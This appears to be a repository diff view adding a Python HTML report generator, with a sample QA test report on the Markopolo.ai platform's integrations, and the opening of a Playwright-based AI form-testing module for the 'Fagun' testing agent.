|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
HTML Report Generator with modern, colorful UI
|
| 3 |
+
"""
|
| 4 |
+
|
| 5 |
+
import os
|
| 6 |
+
from datetime import datetime
|
| 7 |
+
from typing import Optional
|
| 8 |
+
|
| 9 |
+
|
| 10 |
+
def _base_html(title: str, body_html: str) -> str:
|
| 11 |
+
return f"""
|
| 12 |
+
<!DOCTYPE html>
|
| 13 |
+
<html lang="en">
|
| 14 |
+
<head>
|
| 15 |
+
<meta charset="UTF-8" />
|
| 16 |
+
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
|
| 17 |
+
<title>{title}</title>
|
| 18 |
+
<link rel="preconnect" href="https://fonts.googleapis.com">
|
| 19 |
+
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
|
| 20 |
+
<link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;600;700&display=swap" rel="stylesheet">
|
| 21 |
+
<style>
|
| 22 |
+
:root {{
|
| 23 |
+
--bg: #0f172a;
|
| 24 |
+
--card: #111827;
|
| 25 |
+
--text: #e5e7eb;
|
| 26 |
+
--muted: #94a3b8;
|
| 27 |
+
--primary: #06b6d4;
|
| 28 |
+
--primary-2: #3b82f6;
|
| 29 |
+
--ok: #22c55e;
|
| 30 |
+
--warn: #f59e0b;
|
| 31 |
+
--crit: #ef4444;
|
| 32 |
+
}}
|
| 33 |
+
* {{ box-sizing: border-box; }}
|
| 34 |
+
body {{ margin: 0; font-family: Inter, system-ui, -apple-system, Segoe UI, Roboto, Arial; background: linear-gradient(180deg, #0b1022, #0f172a); color: var(--text); }}
|
| 35 |
+
.container {{ max-width: 1080px; margin: 32px auto; padding: 0 16px; }}
|
| 36 |
+
.header {{ background: radial-gradient(1200px 400px at 20% -10%, rgba(59,130,246,.25), transparent), radial-gradient(900px 400px at 80% 0%, rgba(6,182,212,.25), transparent); border-radius: 16px; padding: 24px; border: 1px solid rgba(255,255,255,.06); }}
|
| 37 |
+
h1 {{ margin: 0 0 8px; font-size: 28px; font-weight: 700; letter-spacing: .3px; }}
|
| 38 |
+
.meta {{ color: var(--muted); font-size: 13px; }}
|
| 39 |
+
.grid {{ display: grid; gap: 16px; grid-template-columns: repeat(12, 1fr); margin-top: 24px; }}
|
| 40 |
+
.card {{ grid-column: span 12; background: linear-gradient(180deg, #0f172a, #0b1324); border: 1px solid rgba(255,255,255,.06); border-radius: 14px; padding: 18px; }}
|
| 41 |
+
@media (min-width: 900px) {{ .span-6 {{ grid-column: span 6; }} }}
|
| 42 |
+
h2 {{ margin: 0 0 12px; font-size: 20px; font-weight: 700; color: #ffffff; }}
|
| 43 |
+
h3 {{ margin: 16px 0 8px; font-size: 16px; font-weight: 700; color: #ffffff; }}
|
| 44 |
+
p {{ color: var(--text); line-height: 1.6; margin: 8px 0; }}
|
| 45 |
+
.status {{ display: inline-block; padding: 2px 8px; border-radius: 999px; font-size: 12px; font-weight: 600; margin-left: 8px; }}
|
| 46 |
+
.ok {{ background: rgba(34,197,94,.12); color: var(--ok); border: 1px solid rgba(34,197,94,.3); }}
|
| 47 |
+
.warn {{ background: rgba(245,158,11,.12); color: var(--warn); border: 1px solid rgba(245,158,11,.3); }}
|
| 48 |
+
.crit {{ background: rgba(239,68,68,.12); color: var(--crit); border: 1px solid rgba(239,68,68,.3); }}
|
| 49 |
+
ul {{ margin: 8px 0 8px 20px; color: var(--text); }}
|
| 50 |
+
li {{ margin: 6px 0; }}
|
| 51 |
+
.pill {{ display:inline-block; padding: 2px 10px; margin: 2px 6px 2px 0; border-radius: 999px; background: rgba(255,255,255,.06); color: var(--muted); font-size: 12px; }}
|
| 52 |
+
.footer {{ margin-top: 24px; color: var(--muted); font-size: 12px; text-align: center; }}
|
| 53 |
+
a {{ color: var(--primary-2); text-decoration: none; }}
|
| 54 |
+
a:hover {{ text-decoration: underline; }}
|
| 55 |
+
</style>
|
| 56 |
+
</head>
|
| 57 |
+
<body>
|
| 58 |
+
<div class="container">
|
| 59 |
+
<div class="header">
|
| 60 |
+
<h1>{title}</h1>
|
| 61 |
+
<div class="meta">Generated at {datetime.now().isoformat()}</div>
|
| 62 |
+
</div>
|
| 63 |
+
<div class="grid">
|
| 64 |
+
{body_html}
|
| 65 |
+
</div>
|
| 66 |
+
<div class="footer">Fagun AI Testing Agent • Modern HTML Report</div>
|
| 67 |
+
</div>
|
| 68 |
+
</body>
|
| 69 |
+
</html>
|
| 70 |
+
"""
|
| 71 |
+
|
| 72 |
+
|
| 73 |
+
def generate_html_report_file(title: str, body_html: str, output_dir: str = "reports", filename: Optional[str] = None) -> str:
|
| 74 |
+
os.makedirs(output_dir, exist_ok=True)
|
| 75 |
+
if not filename:
|
| 76 |
+
filename = f"report_{datetime.now().strftime('%Y%m%d_%H%M%S')}.html"
|
| 77 |
+
path = os.path.join(output_dir, filename)
|
| 78 |
+
html = _base_html(title, body_html)
|
| 79 |
+
with open(path, "w", encoding="utf-8") as f:
|
| 80 |
+
f.write(html)
|
| 81 |
+
return path
|
| 82 |
+
|
| 83 |
+
|
| 84 |
+
def generate_markopolo_sample_report() -> str:
|
| 85 |
+
title = "Comprehensive Testing Report for Markopolo.ai Platform"
|
| 86 |
+
# Body authored as HTML blocks for fidelity
|
| 87 |
+
sections = [
|
| 88 |
+
(
|
| 89 |
+
"Executive Summary",
|
| 90 |
+
"""
|
| 91 |
+
<p>I have conducted a comprehensive test of the Markopolo.ai platform, focusing on the onboarding process, data connections, integrations, and core modules. The testing revealed several critical issues that prevent full platform functionality, particularly with Shopify integration and data connectivity.</p>
|
| 92 |
+
""",
|
| 93 |
+
),
|
| 94 |
+
(
|
| 95 |
+
"Test Results by Module",
|
| 96 |
+
"""
|
| 97 |
+
<div class="card"><h3>1. Onboarding Process <span class="status warn">Partially Successful</span></h3>
|
| 98 |
+
<ul>
|
| 99 |
+
<li>✅ Successfully logged into the platform</li>
|
| 100 |
+
<li>✅ Initial onboarding screen accessed</li>
|
| 101 |
+
<li>❌ Onboarding process appeared to be skipped or completed automatically</li>
|
| 102 |
+
<li>❌ No guided onboarding flow was experienced</li>
|
| 103 |
+
</ul>
|
| 104 |
+
</div>
|
| 105 |
+
|
| 106 |
+
<div class="card"><h3>2. Dataroom & Data Container <span class="status warn">Mixed Results</span></h3>
|
| 107 |
+
<h4>Client-side MarkTag</h4>
|
| 108 |
+
<ul>
|
| 109 |
+
<li>✅ Successfully connected and active</li>
|
| 110 |
+
<li>✅ Basic setup completed without issues</li>
|
| 111 |
+
</ul>
|
| 112 |
+
<h4>Server-side MarkTag</h4>
|
| 113 |
+
<ul>
|
| 114 |
+
<li>❌ <b>Critical Failure</b>: DNS verification failed repeatedly</li>
|
| 115 |
+
<li>❌ Unable to verify DNS records (CNAME and TXT records)</li>
|
| 116 |
+
<li>❌ System consistently showed "Records failed to verify"</li>
|
| 117 |
+
<li><b>Impact</b>: Server-side tracking capabilities unavailable</li>
|
| 118 |
+
</ul>
|
| 119 |
+
</div>
|
| 120 |
+
|
| 121 |
+
<div class="card"><h3>3. Integrations <span class="status warn">Mixed Results</span></h3>
|
| 122 |
+
<h4>Email Services</h4>
|
| 123 |
+
<ul>
|
| 124 |
+
<li>✅ <b>SendGrid</b>: Successfully connected using provided API key</li>
|
| 125 |
+
<li>✅ <b>Resend</b>: Already connected and functional</li>
|
| 126 |
+
<li>❌ <b>Twilio</b>: Failed to validate credentials despite multiple attempts<br/>Error: "Failed to save information!"</li>
|
| 127 |
+
</ul>
|
| 128 |
+
<h4>WhatsApp Integration</h4>
|
| 129 |
+
<ul>
|
| 130 |
+
<li>❌ <b>Critical Failure</b>: Unable to connect (dependent on Twilio)</li>
|
| 131 |
+
</ul>
|
| 132 |
+
<h4>CRM Integrations</h4>
|
| 133 |
+
<ul>
|
| 134 |
+
<li>✅ <b>HubSpot</b>: Connected</li>
|
| 135 |
+
<li>✅ <b>Pipedrive</b>: Connected</li>
|
| 136 |
+
<li>❌ <b>Salesforce</b>: Connection failed - no credentials</li>
|
| 137 |
+
<li>❌ <b>Zoho CRM</b>: Connection failed - no credentials</li>
|
| 138 |
+
</ul>
|
| 139 |
+
</div>
|
| 140 |
+
|
| 141 |
+
<div class="card"><h3>4. Shopify Integration <span class="status crit">Critical Failure</span></h3>
|
| 142 |
+
<ul>
|
| 143 |
+
<li>✅ Accessed Shopify connection interface</li>
|
| 144 |
+
<li>✅ Entered test store URL: <code>testshop.myshopify.com</code></li>
|
| 145 |
+
<li>✅ Navigated to Shopify login page</li>
|
| 146 |
+
<li>❌ Unauthorized Access Error upon login attempt</li>
|
| 147 |
+
</ul>
|
| 148 |
+
<p><b>Impact</b>: Unable to test Shopify-specific flows (campaigns, discounts, event tracking).</p>
|
| 149 |
+
</div>
|
| 150 |
+
|
| 151 |
+
<div class="card"><h3>5. Users Module <span class="status warn">Partially Tested</span></h3>
|
| 152 |
+
<ul>
|
| 153 |
+
<li>✅ Accessed Users interface</li>
|
| 154 |
+
<li>✅ Download template works</li>
|
| 155 |
+
<li>❌ Unable to upload leads: File upload requires pre-defined file paths</li>
|
| 156 |
+
</ul>
|
| 157 |
+
</div>
|
| 158 |
+
|
| 159 |
+
<div class="card"><h3>6. Audience Studio <span class="status warn">Functional but Limited</span></h3>
|
| 160 |
+
<ul>
|
| 161 |
+
<li>✅ Interface accessible</li>
|
| 162 |
+
<li>❌ AI query failure prevented audience creation</li>
|
| 163 |
+
</ul>
|
| 164 |
+
</div>
|
| 165 |
+
|
| 166 |
+
<div class="card"><h3>7. Analytics Module <span class="status warn">Limited Functionality</span></h3>
|
| 167 |
+
<ul>
|
| 168 |
+
<li>✅ Interface accessible</li>
|
| 169 |
+
<li>❌ No data available; tracking not validated</li>
|
| 170 |
+
</ul>
|
| 171 |
+
</div>
|
| 172 |
+
|
| 173 |
+
<div class="card"><h3>8. Knowledge Base <span class="status warn">Not Tested</span></h3>
|
| 174 |
+
<ul><li>❌ Not located during testing</li></ul>
|
| 175 |
+
</div>
|
| 176 |
+
""",
|
| 177 |
+
),
|
| 178 |
+
(
|
| 179 |
+
"Critical Issues Identified",
|
| 180 |
+
"""
|
| 181 |
+
<ul>
|
| 182 |
+
<li><b>Shopify Integration</b> – <span class="status crit">Critical</span>: Unauthorized access blocking store connection</li>
|
| 183 |
+
<li><b>Server-side MarkTag DNS</b> – <span class="status warn">High</span>: DNS verification failing</li>
|
| 184 |
+
<li><b>Twilio Integration</b> – <span class="status warn">High</span>: Credential validation failing</li>
|
| 185 |
+
<li><b>Data Connectivity</b> – <span class="status warn">Medium</span>: Multiple integration failures</li>
|
| 186 |
+
</ul>
|
| 187 |
+
""",
|
| 188 |
+
),
|
| 189 |
+
(
|
| 190 |
+
"Recommendations",
|
| 191 |
+
"""
|
| 192 |
+
<ol>
|
| 193 |
+
<li><b>Priority 1</b>: Resolve Shopify authentication issues</li>
|
| 194 |
+
<li><b>Priority 1</b>: Fix Twilio credential validation</li>
|
| 195 |
+
<li><b>Priority 2</b>: Address server-side MarkTag DNS verification</li>
|
| 196 |
+
<li><b>Priority 2</b>: Improve error messaging and user guidance</li>
|
| 197 |
+
<li><b>Priority 3</b>: Validate file upload flow with proper file handling</li>
|
| 198 |
+
</ol>
|
| 199 |
+
""",
|
| 200 |
+
),
|
| 201 |
+
(
|
| 202 |
+
"Conclusion",
|
| 203 |
+
"""
|
| 204 |
+
<p><b>Overall Platform Readiness</b>: <span class="status warn">Limited</span> – key flows blocked by integration failures. Retest end-to-end journey after addressing blockers, especially Shopify.</p>
|
| 205 |
+
""",
|
| 206 |
+
),
|
| 207 |
+
]
|
| 208 |
+
|
| 209 |
+
body = "".join([f'<div class="card"><h2>{h}</h2>{c}</div>' for h, c in sections])
|
| 210 |
+
return generate_html_report_file(title, body, output_dir="reports", filename=f"markopolo_report_{datetime.now().strftime('%Y%m%d_%H%M%S')}.html")
|
| 211 |
+
|
| 212 |
+
|
src/utils/intelligent_form_testing.py
ADDED
|
@@ -0,0 +1,1096 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Intelligent Form Testing
|
| 3 |
+
====================================================================
|
| 4 |
+
|
| 5 |
+
Advanced AI-powered form testing with comprehensive scenario coverage.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import asyncio
|
| 13 |
+
import logging
|
| 14 |
+
import random
|
| 15 |
+
import string
|
| 16 |
+
from typing import Dict, List, Optional, Tuple, Any
|
| 17 |
+
from dataclasses import dataclass
|
| 18 |
+
from datetime import datetime
|
| 19 |
+
import json
|
| 20 |
+
|
| 21 |
+
from playwright.async_api import Page, Locator, Error as PlaywrightError
|
| 22 |
+
from langchain_core.language_models.chat_models import BaseChatModel
|
| 23 |
+
|
| 24 |
+
from src.utils.advanced_error_handler import AdvancedErrorHandler, DetailedError
|
| 25 |
+
|
| 26 |
+
logger = logging.getLogger(__name__)
|
| 27 |
+
|
| 28 |
+
@dataclass
|
| 29 |
+
class FormField:
|
| 30 |
+
"""Represents a form field with its properties and testing data."""
|
| 31 |
+
element: Locator
|
| 32 |
+
field_type: str
|
| 33 |
+
name: str
|
| 34 |
+
placeholder: str
|
| 35 |
+
required: bool
|
| 36 |
+
validation_pattern: Optional[str] = None
|
| 37 |
+
min_length: Optional[int] = None
|
| 38 |
+
max_length: Optional[int] = None
|
| 39 |
+
options: List[str] = None
|
| 40 |
+
|
| 41 |
+
@dataclass
|
| 42 |
+
class TestScenario:
|
| 43 |
+
"""Represents a test scenario with input data and expected behavior."""
|
| 44 |
+
name: str
|
| 45 |
+
data: Dict[str, Any]
|
| 46 |
+
expected_result: str
|
| 47 |
+
description: str
|
| 48 |
+
priority: int = 1 # 1=high, 2=medium, 3=low
|
| 49 |
+
|
| 50 |
+
@dataclass
|
| 51 |
+
class TestResult:
|
| 52 |
+
"""Represents the result of a test scenario."""
|
| 53 |
+
scenario: TestScenario
|
| 54 |
+
success: bool
|
| 55 |
+
actual_result: str
|
| 56 |
+
error_message: Optional[str] = None
|
| 57 |
+
screenshot_path: Optional[str] = None
|
| 58 |
+
timestamp: datetime = None
|
| 59 |
+
|
| 60 |
+
class IntelligentFormTester:
|
| 61 |
+
"""Advanced AI-powered form testing engine."""
|
| 62 |
+
|
| 63 |
+
def __init__(self, llm: BaseChatModel, page: Page):
|
| 64 |
+
self.llm = llm
|
| 65 |
+
self.page = page
|
| 66 |
+
self.test_results: List[TestResult] = []
|
| 67 |
+
self.form_fields: List[FormField] = []
|
| 68 |
+
self.error_handler = AdvancedErrorHandler(page)
|
